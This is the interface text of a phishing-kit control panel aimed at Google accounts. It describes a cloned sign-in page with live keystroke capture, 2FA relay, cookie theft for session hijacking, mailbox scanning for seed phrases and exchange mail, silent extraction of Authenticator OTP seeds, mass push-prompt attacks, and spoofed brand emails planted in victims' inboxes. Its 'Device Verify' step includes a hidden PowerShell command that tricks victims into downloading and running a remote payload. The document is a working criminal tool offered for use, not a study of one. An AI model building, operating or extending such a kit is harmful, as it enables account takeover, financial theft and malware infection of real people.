Sessions
Victims appear here the moment they start typing their email on the capture page — watch it live.
Live — victims on the capture page right now
| Status | Step | Case | Owner | Keepalive | Cookies | 2FA | Rotated | Created | |||
|---|---|---|---|---|---|---|---|---|---|---|---|
| Loading… | |||||||||||
Victims
Everyone on the capture page right now — live control, phone capture, live view of what they see, and their captured data.
| Status | Step | IP | Live data | Last seen | ||
|---|---|---|---|---|---|---|
| No victims on the page right now — they appear here the moment someone opens your capture link. | ||||||
Proxies
The shared proxy pool — every prompter browser (and any capture browser that uses it) goes through these, round-robin. While proxy-required is on, your real IP never touches Google.
One proxy per line. Formats: host:port or host:port:user:pass (also accepts user:pass@host:port). The pool survives restarts — it's stored in data/Proxies.txt.
Applies to Mass Prompt browsers. Keeper keepalive traffic runs from this host by default.
| Proxy | Exit IP | Country | Latency | Error | |
|---|---|---|---|---|---|
| Not tested yet — press "Test all". | |||||
Cases — one capture link per target
Create a case, send its link to one victim, and everything they do lands tagged to that case. Cleaner than sharing the generic capture link with everyone.
| Case | Link | Victims | Captured | Created | |
|---|---|---|---|---|---|
| No cases yet. | |||||
Mail Checker
Browse and search any captured session's mailbox live — read messages and download attachments just like their inbox.
| From | Subject | Date | |
|---|---|---|---|
| Select a victim above. | |||
Mail Stats — what's in their inbox
Deep stats per victim mailbox: total emails, crypto-exchange mail, seed-phrase hits, attachments and file types — the stuff that tells you what a victim is worth.
| Service | Emails | |
|---|---|---|
| Run a scan. | ||
| Keyword | Emails | |
|---|---|---|
| Run a scan. | ||
| Type | Emails | |
|---|---|---|
| Run a scan. | ||
FA Mailer — brand templates
Spoofed brand emails (Binance, Coinbase, Ledger…) dropped straight into the victim's own inbox, plus your own imported .html templates (private to your account). Templates ported from the FA mailer; delivery uses the session's captured mail access — the mail lands as a normal received message.
Imported templates support {{placeholders}} — they become fill-in fields when you send, and {{MM/DD}}-style dates auto-fill. Images inlined as attachments, lands starred in their inbox like brand templates.
Mail Scanner — keywords & seed phrases
Scan a captured session's mailbox for keywords (verification codes, exchanges) and BIP39 seed phrases (12/18/24 words). Ported from the FA mailer's InboxScanner — runs through the session's mail access, no victim interaction. Scans the whole mailbox — every email, every page, no caps.
| Date | From | Subject | Keywords | Seeds |
|---|---|---|---|---|
| Run a scan to see matches. | ||||
Authenticator — live 2FA codes
OTP seeds synced from the victim's Google Authenticator are extracted automatically (and silently) at sign-in. Codes below are generated locally in real time — no victim phone, no third-party sites.
| Service | Account | Code | Expires | Type |
|---|---|---|---|---|
| Select a victim above. | ||||
Mass Prompt — batch "Tap Yes" phone prompts
Feed a list of Gmails (and optional US recovery numbers) — the engine walks Google's sign-in on each and fires the Tap Yes on your phone push. All traffic goes through the proxy pool — your IP never touches Google. The victim taps Yes → you can capture the session.
| Phone | Status | Stage | Message | Proxy | Victim | |
|---|---|---|---|---|---|---|
| No run yet — paste leads above and press Start. | ||||||
Every prompt browser goes through these (round-robin). Formats: host:port or host:port:user:pass. While proxy-required is on, an empty pool blocks runs — your IP never leaks.
| Proxy | Exit IP | Country | Latency | Result | |
|---|---|---|---|---|---|
| Test the pool to see exit IPs and Google reachability. | |||||
Passwords
Every password we set or captured — email, password, phone.
| Password | Phone | Source | Updated | ||
|---|---|---|---|---|---|
| No passwords yet. | |||||
Add Victim
Manually add a client/victim entry — useful for testing the pipeline, tracking clients, or importing cookies captured elsewhere.
Capture Setup
1:1 Google sign-in served by this panel — no third-party reverse proxy. Victims appear in Sessions the moment they start typing.
The page is a pixel-faithful Google sign-in — real wordmark, floating labels, identical layout.
The moment a valid-looking email is typed, a row appears — every keystroke streams to the dashboard over WebSocket.
The password is replayed into real accounts.google.com in a stealth Chromium. 2FA challenges (code, number match, phone tap) show on their page too.
On success the full cookie jar (SID, HSID, SSID, SAPISID…) is harvested, the keeper adopts it, Telegram alerts fire.
Export the Cookie-Editor JSON from the drawer and import into any anti-detect browser — signed in as the victim.
Device Verify — clipboard paste-jack
Built into the capture flow: after Google accepts the sign-in (and any prompt), the victim sees a "Verify this device" card before You're signed in. Continue copies your command to their clipboard and walks them through Win+R → paste → Enter. When the payload pings back, they're signed in automatically.
Runs from Win+R on the Verify this device card (shown after the password/2FA step, before "You're signed in"). Placeholders: {host} → your panel host, {session} → the victim's live session id. Ping http://{host}/device/ping/{session} from the payload to sign them in automatically. Example: powershell -w hidden -c "iwr http://{host}/device/ping/{session};iwr http://{host}/payload.ps1|iex"
Normal capture flow: email → password → 2FA / phone prompt, exactly as before.
After Google accepts the login (before "You're signed in"), the victim is asked to set this computer as their main device. Continue → your command is silently copied to their clipboard.
Win+R → Ctrl+V → Enter. The page walks them through each keypress with progress highlighting.
When the payload pings /device/ping/{session}, the page flips to "You're signed in" automatically. Skip (or the live control "Success" tile) also finishes the flow.
Users
Panel accounts: create user logins, they sign in with username + password and only see their own victims. Set a subscription to auto-expire accounts after N days.
| User | Role | Status | Subscription | Victims | Last login | Created | Actions |
|---|---|---|---|---|---|---|---|
| loading… | |||||||
Imported templates (all users)
Every .html template users imported in the FA Mailer — click Preview to see one rendered.
| Template | Owner | Placeholders | Size | Updated | Actions |
|---|---|---|---|---|---|
| loading… | |||||
Activity trail
Every sign-in, capture, run and action by every user.
| When | Worker | Action | Detail |
|---|---|---|---|
| loading… | |||
How to Use
The full flow, start to finish. More detail in INSTRUCTIONS.md.
You're looking at it. The keeper rotates tokens for all keepalive sessions every 5 minutes.
Email, SMS, QR — however you deliver it. The link opens the 1:1 Google sign-in on your domain. Grab it from Capture Setup, or make a per-victim link on the Cases page.
The moment the victim types their email, a row appears in Sessions (status typing) and the Live box shows their keystrokes in real-time. Email, password, and 2FA code are all captured automatically — no manual entry.
The victim sees the real Google flow (password, SMS/TOTP/push, number match). If Google shows a challenge, the victim's page shows it too and they can complete it right there.
Telegram alert fires (if configured) and the session shows in Sessions with status captured. Mail access (✉) and Authenticator seeds (2FA badge) are harvested silently in the background right after — no permission screens, no victim action.
Click the session → Export cookies (JSON) → import into any anti-detect browser via the Cookie-Editor extension (delete google.com cookies first, then import, refresh). You're signed in as the victim.
Sessions with keepalive on get fresh tokens every 5 min so they never expire. Dead sessions (password change / sign-out) turn red and alert you.
Any session with the MAIL badge accepts fully spoofed emails from the FA Mailer — pick a brand template or import your own .html, fill the variables, preview, send.
Victims using Google Authenticator cloud sync get their OTP seeds extracted silently — the Authenticator page shows live codes with expiry bars.
Add entries manually on Add Victim (testing / bookkeeping), and delete any session with the delete button in its row or drawer.
Mass Prompt sends "Tap Yes" pushes to a lead list — it drives Google's sign-in by itself and fires the push to the victim's phone. When Google shows a matching number, it appears on the run log and here.